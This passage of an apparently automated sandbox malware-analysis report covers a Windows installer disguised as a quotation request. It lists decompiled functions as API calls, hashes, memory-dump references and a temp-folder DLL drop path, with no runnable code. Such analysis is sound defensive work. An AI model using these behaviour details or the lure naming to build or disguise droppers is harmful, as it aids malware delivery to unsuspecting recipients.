                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                • String ID: CB@$Call$N$open
                                                                                                                                • API String ID: 3615053054-4184941720
                                                                                                                                • Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                • Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
                                                                                                                                • Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
                                                                                                                                • Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
                                                                                                                                APIs
                                                                                                                                • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
                                                                                                                                  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
                                                                                                                                • wsprintfA.USER32 ref: 00405C80
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405D71
                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405D78
                                                                                                                                  • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                                • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                                                                                                                                • API String ID: 1265525490-3322868524
                                                                                                                                • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                • Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
                                                                                                                                • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                                                                                                                                • Instruction Fuzzy Hash: 9741E271604B19BBD2216B715C4DF6B3B6CEF41754F14453BBA01B62D2EA3CA8018EBD
                                                                                                                                APIs
                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                • String ID: F
                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                                                                                • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                                                                                • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                                                • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                                                • String ID: @H3w
                                                                                                                                • API String ID: 3579998418-4275297014
                                                                                                                                • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                                                • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061E1
                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061F5
                                                                                                                                • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00406208
                                                                                                                                Strings
                                                                                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040617F, 00406184
                                                                                                                                • "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe", xrefs: 004061C2
                                                                                                                                • *?|<>/":, xrefs: 004061D0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                • API String ID: 589700163-3318446214
                                                                                                                                • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                                                • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                • String ID: 8$C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp$C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp\System.dll
                                                                                                                                • API String ID: 1453599865-2699020899
                                                                                                                                • Opcode ID: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                                                • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                • Opcode Fuzzy Hash: c163f65ad7e3cc19a1ecb41abf68fb20e754719ac06291c3626fea40b4e8fc87
                                                                                                                                • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                APIs
                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                APIs
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3294113728-0
                                                                                                                                • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                                • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                                                                                • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                                • wsprintfW.USER32 ref: 00402D81
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                  • Part of subcall function 00402CFE: MulDiv.KERNEL32(0002CDF3,00000064,0002E9CD), ref: 00402D13
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                • String ID: ... %d%%
                                                                                                                                • API String ID: 722711167-2449383134
                                                                                                                                • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
